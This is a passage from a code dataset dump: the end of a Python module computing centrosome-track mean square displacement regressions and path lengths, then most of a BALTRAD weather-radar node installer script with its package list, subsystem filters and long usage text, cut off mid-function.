msd_lreg(df.set_index(time).sort_index(), centrosome_label=centrosome_label)\n mvtag = pd.DataFrame()\n for id, _df in df.groupby('indiv'):\n c_a = dfreg[(dfreg['indiv'] == id) & (dfreg['centrosome'] == 'A')]['msd_slope'].reset_index(drop=True)\n c_b = dfreg[(dfreg['indiv'] == id) & (dfreg['centrosome'] == 'B')]['msd_slope'].reset_index(drop=True)\n if len(c_a) == 0 or len(c_b) == 0: continue\n c_a = c_a[0]\n c_b = c_b[0]\n if c_a > c_b:\n _df.loc[_df[centrosome_label] == 'A', 'msd_cat'] = 'displacing more'\n _df.loc[_df[centrosome_label] == 'B', 'msd_cat'] = 'displacing less'\n else:\n _df.loc[_df[centrosome_label] == 'B', 'msd_cat'] = 'displacing more'\n _df.loc[_df[centrosome_label] == 'A', 'msd_cat'] = 'displacing less'\n mvtag = mvtag.append(_df)\n pd.set_option('mode.chained_assignment', 'warn')\n return mvtag\n\n\ndef msd_lreg(df, centrosome_label='centrosome'):\n \"\"\"\n Computes a linear regression of the Mean Square Displacement\n \"\"\"\n from sklearn import linear_model\n msd_lr = pd.DataFrame()\n for _id, _df in df.groupby('trk'):\n # do linear regression of both tracks to see which has higher slope\n x = _df.index.values\n y = _df['msd'].values\n length = len(x)\n x = x.reshape(length, 1)\n y = y.reshape(length, 1)\n if np.isnan(y).any():\n logging.warning('MSD of track tag %d contains NaNs.' % _id)\n else:\n regr = linear_model.LinearRegression()\n regr.fit(x, y)\n msdlr = pd.DataFrame(data={'indiv': _df['indiv'].iloc[0],\n 'condition': _df['condition'].iloc[0],\n 'centrosome': _df[centrosome_label].iloc[0],\n 'msd_slope': [regr.coef_[0][0]],\n 'msd_intercept': [regr.intercept_[0]]})\n\n msd_lr = msd_lr.append(msdlr)\n\n return msd_lr\n\n\ndef agg_trk_length(df):\n \"\"\"\n Computes path length\n \"\"\"\n df = df.set_index('frame').sort_index()\n _dx2 = df.loc[:, 'x'].diff().apply(lambda x: x ** 2)\n _dy2 = df.loc[:, 'y'].diff().apply(lambda y: y ** 2)\n return np.sum((_dx2 + _dy2).apply(np.sqrt))\n\n\ndef trk_length(df):\n \"\"\"\n Computes path length\n \"\"\"\n df = df.set_index('frame').sort_index()\n _dx2 = df.loc[:, 'x'].diff().apply(lambda x: x ** 2)\n _dy2 = df.loc[:, 'y'].diff().apply(lambda y: y ** 2)\n df.loc[:, 's'] = np.sqrt(_dx2 + _dy2)\n df.at[0, 's'] = 0\n return df.reset_index()\n # return np.sum((_dx2 + _dy2).apply(np.sqrt))\n\n\ndef get_trk_length(df, x='x', y='y', time='time', frame='frame', group=None):\n \"\"\"\n Computes path length for each group\n \"\"\"\n df = df.rename(columns={x: 'x', y: 'y', frame: 'frame', time: 'time'})\n dfout = df.groupby(group).apply(trk_length)\n return dfout.reset_index(drop=True)\n","repo_name":"HocheggerLab/centrosome-tracking","sub_path":"mechanics.py","file_name":"mechanics.py","file_ext":"py","file_size_in_byte":7713,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"21466811214","text":"'''\nCreated on Jan 21, 2011\n\n@author: anders\n'''\nimport os\nimport getopt\nimport sys\n\nsys.path.append(\"../src\")\nsys.path.append(\"../bin\") # To get this directory\n\nfrom InstallerException import InstallerException\nfrom package import package\nfrom urlfetcher import urlfetcher\nfrom cmmi import cmmi\nfrom untar import untar\nfrom nodir import nodir\nfrom buildenv import buildenv\nfrom osenv import osenv\nfrom shinstaller import shinstaller\nfrom pilinstaller import pilinstaller\nfrom tomcatinstaller import tomcatinstaller\nfrom hdfjavainstaller import hdfjavainstaller\nfrom hdfjavainstaller import hdfjavasetupinstaller\nfrom machinefetcher import machinefetcher\nfrom jdkvalidator import jdkvalidator\nfrom zlibvalidator import zlibvalidator\nfrom psqlvalidator import psqlvalidator\nfrom doxygenvalidator import doxygenvalidator\nfrom hlhdfinstaller import hlhdfinstaller\nfrom bbufrinstaller import bbufrinstaller\nfrom bdbinstaller import bdbinstaller\nfrom beastinstaller import beastinstaller\nfrom dexinstaller import dexinstaller\nfrom raveinstaller import raveinstaller\nfrom ravegmapinstaller import ravegmapinstaller\nfrom bropoinstaller import bropoinstaller\nfrom beambinstaller import beambinstaller\nfrom bwrwpinstaller import bwrwpinstaller\nfrom dbinstaller import dbinstaller, dbupgrader\nfrom nodescripts import nodescripts\nfrom deployer import deployer\nfrom configinstaller import configinstaller\nfrom raveconfiginstaller import raveconfiginstaller\nfrom scriptinstaller import scriptinstaller\nfrom patcher import patcher\nfrom finished import finished\nfrom pipinstaller import pipinstaller\nfrom pipfetcher import pipfetcher\nfrom prepareinstaller import prepareinstaller\nfrom keystoreinstaller import keystoreinstaller\nfrom docinstaller import docinstaller\nfrom nullinstaller import nullinstaller\nfrom netcdfinstaller import netcdfinstaller\nfrom pychoiceinstaller import pychoiceinstaller\n\nfrom node_package import node_package\nfrom rave_package import rave_package\n\nfrom extra_functions import *\nfrom node_installer import node_installer\nfrom experimental import experimental\n\n##\n# All modules that should be installed for the baltrad node\n# Note, it is essential that the order is correct here since\n# they will be installed in this order. There is no dependency\n# checking for this.\n#\n# So, if for example HDF5 is dependent on ZLIB. ZLIB must be installed prior to\n# HDF5. But since HDF5 is dependent on ZLIB, HDF5 must get the depends set to ZLIB\n# so that HDF5 is rebuilt each time ZLIB is rebuilt.\n##\nMODULES=[prepareinstaller(package(\"PREPARE\", \"1.0\", nodir(), remembered=False)),\n shinstaller(package(\"ZLIB\", \"1.2.11\", nodir()),\":\"),\n\n cmmi(package(\"HDF5\", \"1.10.1\",\n untar(urlfetcher(\"hdf5-1.10.1.tar.gz\"), \"hdf5-1.10.1\", True),\n depends=[\"ZLIB\"]),\n \"--prefix=\\\"$TPREFIX\\\" --with-pthread=yes --enable-threadsafe --enable-unsupported\", False, True, # unsupported for MT + HL library\n foptionalarg=hdf5_optional_zlib_arg),\n \n netcdfinstaller(package(\"NETCDF\", \"4.5.0\",\n untar(urlfetcher(\"netcdf-c-4.5.0.tar.gz\"), \"netcdf-c-4.5.0\", True),\n depends=[\"ZLIB\", \"HDF5\"])),\n \n cmmi(package(\"EXPAT\", \"2.0.1\",\n untar(urlfetcher(\"expat-2.0.1.tar.gz\"), \"expat-2.0.1\", True)),\n \"--prefix=\\\"$TPREFIX\\\"\", False, True),\n \n cmmi(package(\"PROJ.4\", \"4.7.0\",\n untar(urlfetcher(\"proj-4.7.0.tar.gz\"), \"proj-4.7.0\", True)),\n \"--prefix=\\\"$TPREFIX\\\" --with-jni=\\\"$JDKHOME/include\\\"\", False, True,\n osenv({\"CFLAGS\":\"-I\\\"$JDKHOME/include/linux\\\"\"})),\n\n shinstaller(package(\"PYTHON\", \".\".join([str(x) for x in sys.version_info[:3]]), nodir()),\n \":\"),\n\n cmmi(package(\"CURL\", \"7.22.0\",\n untar(urlfetcher(\"curl-7.22.0.tar.gz\"), \"curl-7.22.0\", True)),\n \"--prefix=\\\"$TPREFIX\\\"\", False, True),\n]\n\n#MODULES.append(pipinstaller(package(\"PYCURL\", \"7.43.0.1\", \n# fetcher=pipfetcher(),\n# depends=[\"PYTHON\",\"CURL\"], \n# extra_attrs={\"pypi_name\":\"pycurl\"}),\npipoenv=osenv({\"LD_LIBRARY_PATH\":\"$TPREFIX/lib\", \"PATH\":\"$TPREFIX/bin:$$PATH\"})\n \n_PIP_MODULES=[\n (\"NUMPY\", \"1.14.2\", \"numpy\", [\"PYTHON\"], pipoenv),\n (\"PILLOW\", \"5.0.0\", \"pillow\", [\"PYTHON\"], pipoenv),\n (\"PYCRYPTO\", \"2.6.1\", \"pycrypto\", [\"PYTHON\"], None),\n (\"PYASN1\", \"0.1.2\", \"pyasn1\", [\"PYTHON\"], None),\n# (\"PYTHON-KEYCZAR\", \"0.7b\", \"python-keyczar\", [\"PYTHON\", \"PYASN1\", \"PYCRYPTO\"], None),\n (\"JPROPS\", \"2.0.2\", \"jprops\", [\"PYTHON\"], None),\n (\"LOCKFILE\", \"0.9.1\", \"lockfile\", [\"PYTHON\"], None),\n (\"PYTHON-DAEMON\", \"2.1.2\", \"python-daemon\", [\"PYTHON\", \"LOCKFILE\"], None),\n (\"PSYCOPG2\", \"2.7.3.2\", \"psycopg2\", [\"PYTHON\"], None),\n (\"DECORATOR\", \"3.3.2\", \"decorator\", [\"PYTHON\"], None),\n (\"TEMPITA\", \"0.5.1\", \"Tempita\", [\"PYTHON\"], None),\n (\"SQLALCHEMY\", \"1.0.13\", \"sqlalchemy\", [\"PYTHON\"], None),\n (\"SQLALCHEMY-MIGRATE\", \"0.10.0\", \"sqlalchemy-migrate\", [\"PYTHON\", \"SQLALCHEMY\", \"DECORATOR\", \"TEMPITA\"], None),\n (\"WERKZEUG\", \"1.0.1\", \"werkzeug\", [\"PYTHON\"], None),\n (\"PYTHON-MOCK\", \"2.0.0\", \"mock\", [\"PYTHON\"], None),\n (\"NOSE\", \"1.3.7\", \"nose\", [\"PYTHON\"], None),\n (\"PYINOTIFY\", \"0.9.3\", \"pyinotify\", [\"PYTHON\"], None),\n# (\"PROGRESSBAR\", \"2.2\", \"progressbar\", [\"PYTHON\"], None),\n (\"CHERRYPY\", \"3.2.4\", \"cherrypy\", [\"PYTHON\"], None),\n]\n\n_PIP_DEP=[]\n\nfor (name, version, pypi_name, deps, poenv) in _PIP_MODULES:\n MODULES.append(\n pipinstaller(\n package(\n name, version,\n fetcher=pipfetcher(),\n depends=deps,\n extra_attrs={\n \"pypi_name\": pypi_name,\n }\n ),\n oenv=poenv\n )\n )\n _PIP_DEP.append(name)\n\nMODULES.append(pipinstaller(package(\"PYTHON3-KEYCZAR\", \"0.71rc0\", fetcher=pipfetcher(), depends=[\"PYTHON\", \"PYASN1\", \"PYCRYPTO\"], extra_attrs={\"pypi_name\": \"python3_keyczar\"})))\n\nMODULES.append(pipinstaller(package(\"PROGRESSBAR33\", \"2.4\", fetcher=pipfetcher(), depends=[\"PYTHON\"], extra_attrs={\"pypi_name\": \"progressbar33\"})))\n\nMODULES.append(experimental(pipinstaller(package(\"ARGPARSE\", \"1.2.1\", fetcher=pipfetcher(), extra_attrs={\"pypi_name\": \"argparse\"})),\n nullinstaller(package(\"ARGPARSE\", \"1.2.1\", fetcher=pipfetcher(), extra_attrs={\"pypi_name\": \"argparse\"})))\n )\n\nMODULES.extend([\n tomcatinstaller(package(\"TOMCAT\", \"7.0.64-1\",\n untar(urlfetcher(\"apache-tomcat-7.0.64.tar.gz\"), \"apache-tomcat-7.0.64\", True))),\n \n hdfjavainstaller(package(\"HDFJAVA\", \"2.6.1\",\n machinefetcher({\n 'i386':untar(urlfetcher(\"hdf-java-2.6.1-i386-bin.tar\"), \"hdf-java\", False),\n 'i686':untar(urlfetcher(\"hdf-java-2.6.1-i386-bin.tar\"), \"hdf-java\", False), #i686 is 32bit\n 'x86_64':untar(urlfetcher(\"hdf-java-2.6.1-x86_64-bin.tar\"), \"hdf-java\", False)}\n ))),\n \n shinstaller(package(\"ANT\", \"1.8.0\",\n untar(urlfetcher(\"apache-ant-1.8.0-bin.tar.gz\"), \".\", True)),\n \"rm -fr \\\"$TPREFIX/ant\\\"; mv -f apache-ant-1.8.0 \\\"$TPREFIX/ant\\\"\"),\n \n hdfjavasetupinstaller(package(\"HDFJAVASETUP\", \"2.6.1\", depends=[\"TOMCAT\", \"HDFJAVA\"])),\n \n # Time to install baltrad node software\n keystoreinstaller(package(\"KEYSTORE\", \"1.1\", nodir())),\n \n hlhdfinstaller(node_package(\"HLHDF\", depends=[\"ZLIB\", \"HDF5\", \"PYTHON\"])),\n\n bbufrinstaller(node_package(\"BBUFR\", depends=[\"ZLIB\"])),\n\n bdbinstaller(node_package(\"BALTRAD-DB\", depends=[\"ZLIB\", \"HDF5\", \"HLHDF\", \"PYTHON\"])),\n \n beastinstaller(node_package(\"BEAST\", depends=[\"BALTRAD-DB\"])),\n \n dexinstaller(node_package(\"BALTRAD-DEX\", depends=[\"HDFJAVA\", \"TOMCAT\", \"BALTRAD-DB\", \"BEAST\"])),\n \n raveinstaller(rave_package(depends=[\"EXPAT\", \"PROJ.4\", \"PYTHON\", \"NUMPY\", \"PYSETUPTOOLS\", \"PYCURL\", \"HLHDF\", \"NETCDF\", \"BBUFR\", \"BALTRAD-DB\"])),\n \n ravegmapinstaller(node_package(\"RAVE-GMAP\", depends=[\"RAVE\"])), #Just use rave as dependency, rest of dependencies will trigger rave rebuild\n\n bropoinstaller(node_package(\"BROPO\", depends=[\"RAVE\"])), #Just use rave as dependency, rest of dependencies will trigger rave rebuild\n\n beambinstaller(node_package(\"BEAMB\", depends=[\"RAVE\"])), #Just use rave as dependency, rest of dependencies will trigger rave rebuild\n \n bwrwpinstaller(node_package(\"BWRWP\", depends=[\"RAVE\"])), #Just use rave as dependency, rest of dependencies will trigger rave rebuild\n\n docinstaller(package(\"DOCS\", \"1.0\", nodir(), remembered=False)),\n \n configinstaller(package(\"CONFIG\", \"1.0\", nodir(), remembered=False)),\n \n raveconfiginstaller(package(\"RAVECONFIG\", \"1.0\", nodir(), remembered=False)),\n \n dbinstaller(package(\"DBINSTALL\", \"1.0\", nodir())),\n \n dbupgrader(package(\"DBUPGRADE\", \"1.0\", nodir(), remembered=False)),\n\n deployer(package(\"DEPLOY\", \"1.0\", nodir(), depends=[\"BALTRAD-DEX\"], remembered=False)),\n\n scriptinstaller(package(\"SCRIPT\", \"1.0\", nodir(), remembered=False)),\n \n # Always keep this installer at the end. It will start the system\n # and print out relevant information.\n finished(package(\"FINISHED\", \"1.0\", nodir(), remembered=False)),\n ])\n\n# _PIP_DEP is all PIP installed packages.\n\n## FILTER FOR ALL BALTRAD-DB DEPENDENCIES\nBDB_FILTER=[\"PREPARE\", \"ZLIB\", \"HDF5\", \"PYTHON\", \"NUMPY\"]+_PIP_DEP+[\"ANT\", \"KEYSTORE\", \"HLHDF\", \"CURL\", \"PYCURL\",\n \"BALTRAD-DB\", \"DOCS\", \"CONFIG\", \"DBINSTALL\", \"DBUPGRADE\", \"SCRIPT\", \"FINISHED\"]\n\n## FILTER FOR ALL RAVE DEPENDENCIES. NOTE, RAVE ONLY REQUIRES BDB CLIENT API\nRAVE_FILTER=[\"PREPARE\", \"ZLIB\", \"HDF5\", \"EXPAT\", \"PROJ.4\", \"PYTHON\"]+_PIP_DEP+[\"ANT\", \"NUMPY\",\n \"PIL\", \"CURL\", \"PYCURL\", \"BALTRAD-DB\", \"KEYSTORE\", \"HLHDF\", \"BBUFR\", \n \"RAVE\", \"RAVE-GMAP\", \"BROPO\", \"BEAMB\", \"DOCS\", \"CONFIG\", \n \"RAVECONFIG\", \"SCRIPT\", \"FINISHED\"]\n\n## FILTER FOR ALL STANDALONE RAVE DEPENDENCIES\nSTANDALONE_RAVE=[\"ZLIB\", \"HDF5\", \"EXPAT\", \"PROJ.4\", \"PYTHON\", \"NUMPY\",\n \"PIL\", \"CURL\", \"PYCURL\", \"PYCRYPTO\", \"PYTHON-KEYCZAR\", \"PYINOTIFY\", \"HLHDF\", \"BBUFR\",\n \"RAVE\", \"RAVE-GMAP\", \"BROPO\", \"BEAMB\", \"DOCS\", \"CONFIG\", \"RAVECONFIG\", \"SCRIPT\", \"FINISHED\"]\n\n## FILTER FOR ALL DEX DEPENDENCIES. NOTE, DEX ONLY REQUIRES BDB CLIENT API\nDEX_FILTER=[\"PREPARE\", \"ZLIB\", \"HDF5\", \"PROJ.4\", \"PYTHON\", \"NUMPY\"]+_PIP_DEP+[\"TOMCAT\", \"HDFJAVA\", \n \"ANT\", \"HDFJAVASETUP\", \"KEYSTORE\", \"BALTRAD-DB\", \"BEAST\", \"BALTRAD-DEX\", \"DOCS\", \"CONFIG\", \"DEPLOY\", \"SCRIPT\", \"FINISHED\"]\n \n##\n# Prints the modules and the current version they have.\n#\ndef print_modules(env, modules):\n for module in modules:\n installed = \"NOT INSTALLED\"\n ver = env.getInstalled(module.package().name())\n if ver != None:\n installed = \"INSTALLED\"\n else:\n ver = module.package().version()\n print(\"{0:20s} {1:35s} {2:14s}\".format(module.package().name(),ver, installed))\n\n##\n# All valid subsystems.\nVALID_SUBSYSTEMS=[\"BDB\", \"RAVE\", \"STANDALONE_RAVE\", \"DEX\"]\n\n##\n# Filters out the relevant modules for the specific subsystems\n# \ndef filter_subsystems(modules, subsystems):\n result = []\n main_filter = []\n \n for s in subsystems:\n if not s in VALID_SUBSYSTEMS:\n raise InstallerException(\"Invalid subsystem: %s\"%s)\n \n if \"BDB\" in subsystems:\n main_filter.extend(BDB_FILTER)\n\n if \"RAVE\" in subsystems:\n main_filter.extend(RAVE_FILTER)\n\n if \"STANDALONE_RAVE\" in subsystems:\n main_filter.extend(STANDALONE_RAVE)\n\n if \"DEX\" in subsystems:\n main_filter.extend(DEX_FILTER)\n\n for module in modules:\n if module.package().name() in main_filter:\n result.append(module)\n \n return result\n\n##\n# Prints the current configuration\n#\ndef print_arguments(env):\n arguments = [(\"--prefix=\", env.getArg(\"PREFIX\")),\n (\"--tprefix=\", env.getArg(\"TPREFIX\")),\n (\"--urlrepo=\", env.getArg(\"URLREPO\")),\n (\"--dbuser=\", env.getArg(\"DBUSER\")),\n (\"--dbname=\", env.getArg(\"DBNAME\")),\n (\"--dbhost=\", env.getArg(\"DBHOST\")),\n (\"--dbport=\", env.getArg(\"DBPORT\")),\n (\"--runas=\", env.getArg(\"RUNASUSER\")),\n (\"--with-hdfjava=\", env.getArg(\"HDFJAVAHOME\")),\n (\"--nodename=\", env.getArg(\"NODENAME\"))]\n \n if env.hasArg(\"ZLIBARG\"):\n arguments.append((\"--with-zlib=\", env.getArg(\"ZLIBARG\")))\n if env.hasArg(\"FREETYPE\"):\n arguments.append((\"--with-freetype=\", env.getArg(\"FREETYPE\")))\n if env.hasArg(\"PSQLARG\"):\n arguments.append((\"--with-psql=\", env.getArg(\"PSQLARG\")))\n if env.hasArg(\"DATADIR\"):\n arguments.append((\"--datadir=\", env.getArg(\"DATADIR\")))\n if env.hasArg(\"TOMCATPORT\"):\n arguments.append((\"--tomcatport=\", env.getArg(\"TOMCATPORT\")))\n if env.hasArg(\"TOMCATURL\"):\n arguments.append((\"--tomcaturl=\", env.getArg(\"TOMCATURL\")))\n if env.hasArg(\"WITH_RAVE\") and env.getArg(\"WITH_RAVE\") == True:\n arguments.append((\"--with-rave\", \"\"))\n if env.hasArg(\"WITH_RAVE_GMAP\") and env.getArg(\"WITH_RAVE_GMAP\") == True:\n arguments.append((\"--with-rave-gmap\", \"\"))\n if env.hasArg(\"WITH_BROPO\") and env.getArg(\"WITH_BROPO\") == True:\n arguments.append((\"--with-bropo\", \"\"))\n if env.hasArg(\"WITH_BEAMB\") and env.getArg(\"WITH_BEAMB\") == True:\n arguments.append((\"--with-beamb\", \"\"))\n if env.hasArg(\"JDKHOME\"):\n arguments.append((\"--jdkhome=\", env.getArg(\"JDKHOME\")))\n if env.hasArg(\"KEYSTORE\"):\n arguments.append((\"--keystore=\", env.getArg(\"KEYSTORE\")))\n if env.hasArg(\"KEYSTORE_DN\"):\n arguments.append((\"--keystoredn=\", env.getArg(\"KEYSTORE_DN\")))\n if env.hasArg(\"TOMCATSECUREPORT\"):\n arguments.append((\"--tomcatsecureport=\", env.getArg(\"TOMCATSECUREPORT\")))\n \n\n for a in arguments:\n print(\"{0:25s} {1:35s}\".format(a[0], a[1]))\n\n##\n# Prints information about usage.\n# @param brief if brief usage information should be shown or not\n# @param msg (optional). If brief == True, then this text can be shown if provided\n#\ndef usage(brief, msg=None):\n if brief == True:\n if msg != None:\n print(msg)\n print(\"Usage: setup command, use --help for information\")\n else:\n print(\"\"\"\nNODE INSTALLER\nUsage: setup command, use --help for information\n\nThis is the main installation script for installing a baltrad node.\nMost of the installation is handled without any interaction. However\nif you don't want to specify --tomcatpwd on command line you will\nget a question about it. \n\nThe script will remember several configuration parameters between\nruns but some of them will not be stored, like passwords and\nsimilar items. If you want to use the previous parameters, then\nyou can specify --recall-last-args\n\nCommand:\nValid commands are:\n - install\n Installs the software\n \n - check\n Checks that the provided dependencies are correct\n\n - clean\n Cleans up everything\n\n - fetch\n Fetch all packages so that it is possible to run an installation\n in 'offline' mode. It will atempt to clean up any unessecary \n content but it is suggested to execute clean prior fetch.\n \n - dist\n Create distribution tarball\n \nOptions:\n--help\n Shows this text\n\n--enable-py3\n If you want the system to be built with python3.\n \n--use-ravepy3-repo\n Special variant if you want to use the rave-py3 repository even if you want to install the node with python 2.7.\n This is only really relevant if --enable-py3 isn't specified.\n\n--recall-last-args\n If you want to use the previous arguments, then you can use\n this option. It will try to restore the configuration parameters\n used in the last run. \n\n--nodename=\n This attribute should really be specified but there is a default value which\n is the hostname as shown by the command 'hostname'. The node name is a unique\n identifier that is used for identifying you within the exchange\n network. The node name should usually explain exactly who you are. A good\n example is to use the java package naming. For example se.myorg or se.myorg.test or similar. \n This node name will also defining what this installations key will be named.\n\n--prefix=\n Points out where the system should be installed. \n [Default /opt/baltrad]\n \n--tprefix=\n Points out where the third-party software should be installed.\n [Default /third_party]\n \n--jdkhome=\n Points out the jdkhome directory. If omitted, the installer will\n try to find a valid jdk.\n\n--keystore=\n Point out the keystore directory to use when configuring setting up the\n different modules for certification. If not specified, one will be\n created for you in /etc/bltnode-keystore.\n\n--with-zlib=yes|no||,\n Specifies if zlib should be built by the installer or not. \n [Default yes]\n - 'yes' means that the installer should install the provided zlib\n - 'no' means that the installer should atempt to locate a valid\n zlib installation\n - zlibroot specifies a zlib installation where includes can be \n found in /include and libraries can be found in \n /lib\n - , can be used to point out the specific \n include and library paths\n\n--with-psql=|,\n Specifies where to locate the postgresql include and library files.\n If omitted the install script assumes that they can be found in \n the standard locations.\n - psqlroot specifies a postgres installation where includes can be \n found in /include and libraries can be found in /lib\n - , can be used to point out the specific \n include and library paths\n\n--enable-netcdf\n Specifies if netcdf should be built. It can for example be used for exporting\n CF compliant products from rave. Unfortunately it's not possible to specify an\n external variant of netcdf since netcdf is based on hdf5 and that is also built\n by this installer. Default is not to enable netcdf support.\n \n--with-freetype=,\n In order to get freetype support built in the PIL imaging library\n (for use with google maps plugin). You might have to specify this\n library. is the path to the freetype include directory\n as shown when executing freetype-config --cflags excluding the -I of course.\n is the path where libfreetype.so can be found.\n\n--dbuser=\n Specifies the database user to use. \n [Default baltrad]\n\n--dbpwd=\n Specifies the database user password to use. \n [Default baltrad]\n \n--dbname=\n Specified the database name to use. \n [Default baltrad]\n\n--dbhost=\n Specified the database host to use. \n [Default 127.0.0.1]\n\n--dbport=\n Specified the database port number to use. \n [Default 5432]\n\n--with-hdfjava=\n Specifies the hdf java root installation directory. \n If omitted, the installer will install it's own version of hdf-java.\n \n--reinstalldb\n Reinstalls the database tables. Use with care.\n\n--excludedb\n Ignores installation of the database tables. Might be since they\n already has been installed. This will cause the DBINSTALL package\n to be set as installed.\n \n--runas=\n Specifies the runas user for tomcat and other processes. It is not \n allowed to use a runas user that is root due to security-issues. \n [Defaults to user that is installing]\n\n--datadir=\n The directory where all the data storage files should be placed for baltrad-db.\n [Default /bdb_storage]\n\n--urlrepo=\n The url from where the url packages can be fetched.\n [Default http://ni.baltrad.eu]\n \n--gitrepo=\n The url from where the baltrad node git packages can be fetched.\n For example \"--gitrepo=https://github.com/baltrad\" \n [Default https://github.com/baltrad]\n\n--with-rave\n Install the rave pgf\n\n--rave-pgf-port=\n Set the port rave should run on.\n [default: 8085]\n\n--rave-log-port=\n Set the port the rave logger should run on\n [default: 8089]\n\n--with-bufr\n Install the bufr software. This will also affect rave so that if\n we have specified bufr support rave will be built with bufr support\n enabled as well.\n\n--rave-center-id=\n Originating center id to be used by rave as the source of its products.\n [default: 82]\n\n--rave-dex-spoe=\n Dex's single point of entry to be used by rave. \n [default: localhost:8080]\n \n--with-rave-gmap\n Install the rave google map plugin. Will also cause rave pgf to be installed.\n\n--with-bropo\n Install the anomaly detector bropo. Will also cause rave to be installed.\n\n--with-beamb\n Install the beam blockage detector beamb. Will also cause rave to be installed.\n\n--with-bwrwp\n Installs the baltrad weather radar wind profile generator. Will also cause rave to be installed.\n This is a very special product generator that uses fortran code and requires for example gfortran.\n This product more or less requires that the following options also are specified: --with-blas=,\n --with-cblas=, --with-lapack= and --with-lapacke=.\n\n--with-blas=\n Specifies the directory where the libblas.a library resides. Currently only used when installing bwrwp.\n NOTE that the library objects must have been compiled with -fPIC or similar for shared object capabilities\n since it will be linked into a shared library.\n\n--with-cblas= or ,\n Specifies where the cblas.h include directory and the libcblas.a directory resides. You can also\n specify cblas root directory that should contain the include and lib directory.\n Currently only used when installing bwrwp.\n NOTE that the library objects must have been compiled with -fPIC or similar for shared object capabilities\n since it will be linked into a shared library.\n\n--with-lapack=\n Specifies the directory where the liblapack.a library resides. Currently only used when installing bwrwp.\n NOTE that the library objects must have been compiled with -fPIC or similar for shared object capabilities\n since it will be linked into a shared library.\n\n--with-lapacke= or ,\n Specifies where the cblas.h include directory and the libcblas.a directory resides. You can also\n specify cblas root directory that should contain the include and lib directory.\n Currently only used when installing bwrwp.\n NOTE that the library objects must have been compiled with -fPIC or similar for shared object capabilities\n since it will be linked into a shared library.\n\n--bdb-port=8090\n BDB server port\n\n--bdb-uri=\n The BDB uri, as default this has no use even when specified. It will only be used\n if subsystems has been specified so that you can specify a different BDB server. Also,\n if this is specified, bdb-port will not have any meaning.\n E.g. --bdb-uri=http://somehost:8090\n [Default: Not used]\n\n--bdb-pool-max-size=\n Set the pool size for bdb connections to \n [default: 10]\n\n--bdb-auth=\n BDB authentication model. Valid values are:\n * 'noauth' - perform no authentication\n * 'keyczar' - authenticate using Keyczar, reusing host keys\n [default: keyczar]\n\n--bdb-storage=\n BDB storage model. Valid values are:\n * db - store files in the database with a cache in $DATADIR\n * fs - store files in $DATADIR\n [default: db]\n \n--bdb-cache-size= \n The size (in number of files) of the file cache for database. Is only valid \n if 'bdb-storage=db'.\n [default: 5000]\n \n--bdb-fileentry-cache-size= \n The size (in number of files) of the file-entry cache between the database \n and the Baltrad application. A file's meta-data is placed in this cache \n when added to the database, or when the file is queried in the database. \n When performing queries on a file in the database, this cache is first \n checked, thus lowering the load on the database.\n [default: 500]\n\n--rebuild=,,...\n Will force a rebuild and installation of the specified modules. To get a \n list of available modules and their versions. See option --print-modules.\n E.g. --rebuild=TOMCAT,RAVE\n \n--print-modules\n Prints all available modules and their respective version.\n \n--print-config\n Prints the build configuration\n \n--exclude-tomcat\n Will exclude installation of tomcat. This is not a recommended procedure but \n it is here for the possibility to use your own tomcat installation if it \n is necessary.\n\n--keystoredn=\n The distinguished name used in the keystore cert for the secure communication.\n If is yes, then a number of questions will be asked during the creation of the keystore.\n If is no, then a predefined dn will be created with the format\n \"CN=Unknown,OU=Unknown,O=Unknown,L=Unknown,ST=Unknown,C=Unknown\"\n Or you can specify your own DN, just keep the above format. Note, that you can not specify a dn with any\n spaces in it. If you have that format you will have to use 'yes' instead to get the questions\n [Default yes]\n \n--keystorepwd=\n Specifies the password that should be used for the key. If this has not been defined, the tomcatpwd will be used.\n\n--tomcatport=\n Specifies the port on which the tomcat installation should listen on.\n Don't use together with --tomcaturl. \n [Default 8080]\n\n--tomcatsecureport=\n Specifies the port on which the tomcat installation should listen on for secure messages.\n [Default 8443]\n\n--tomcatfwdports=,\n Specifies that port forwarding has to be supported by the node and hence a secondary mapping\n is added to the dex applicationContext. This attribute is typically used when having the tomcat\n server behind a firewall and proxying calls through a webserver like apache.\n \n--tomcaturl=\n Specifies the tomcat url where the tomcat installation resides. Don't\n use together with --tomcatport. \n [Default http://localhost:8080]\n \n--tomcatpwd=\n Specifies the password that should be used for the manager in the tomcat\n installation.\n \n--force\n Unused at the moment\n \n--experimental\n When running into problems with building, like missing libraries, link problems\n or other miscellaneous problems. This might be the option to specify. Some modules\n are currently beeing evaluated if they are stable enough to be used in production\n and by specifying this option these modules will be built instead.\n \n--no-autostart\n Baltrad will not start automatically after the setup is finished, \n if this argument is used.\n \n--subsystems=(STANDALONE_RAVE, RAVE ,BDB ,DEX)\n If you are interested in running a standalone installation of RAVE, BDB or DEX. It\n is possible to do so by specifying which subsystems that should be installed.\n Since RAVE is depending on the BALTRAD-DB python client API you are able to specify\n a specific RAVE module called STANDALONE_RAVE which installs RAVE without any\n BDB-dependencies.\n\"\"\")\n\ndef parse_buildzlib_argument(arg):\n if arg.lower() == \"no\" or arg.lower() == \"false\":\n return False, None, None\n elif arg.lower() == \"yes\" or arg.lower() == \"true\":\n return True, None, None\n \n tokens = arg.split(\",\")\n if len(tokens) == 2:\n return False, tokens[0], tokens[1]\n elif len(tokens) == 1:\n return False, \"%s/include\"%tokens[0], \"%s/lib\"%tokens[0] \n else:\n raise InstallerException(\"--zlib should either be (no, yes, or , where and/or may be empty\")\n\ndef verify_buildfreetype_argument(arg):\n tokens = arg.split(\",\")\n if len(tokens) != 2:\n raise InstallerException(\"--with-freetype should be --with-freetype=,\")\n\ndef validate_fwdports(arg):\n tokens = arg.split(\",\")\n if len(tokens) != 2:\n raise InstallerException(\"--tomcatfwdports should be called like --tomcatfwdports=, where httpport and httpsport is a number\")\n try:\n a1 = int(tokens[0])\n a2 = int(tokens[1])\n except:\n raise InstallerException(\"--tomcatfwdports should be called like --tomcatfwdports=, where httpport and httpsport is a number\")\n\ndef handle_tomcat_arguments(benv):\n if benv.hasArg(\"TOMCATPORT\") and benv.hasArg(\"TOMCATURL\"):\n # Verify that port does not conflict\n from urlparse import urlparse\n a = urlparse(benv.getArg(\"TOMCATURL\"))\n if a.port == None or \"%s\"%a.port != benv.getArg(\"TOMCATPORT\"):\n raise InstallerException(\"tomcatport and tomcaturl port differs\")\n elif benv.hasArg(\"TOMCATPORT\"):\n benv.addArg(\"TOMCATURL\", 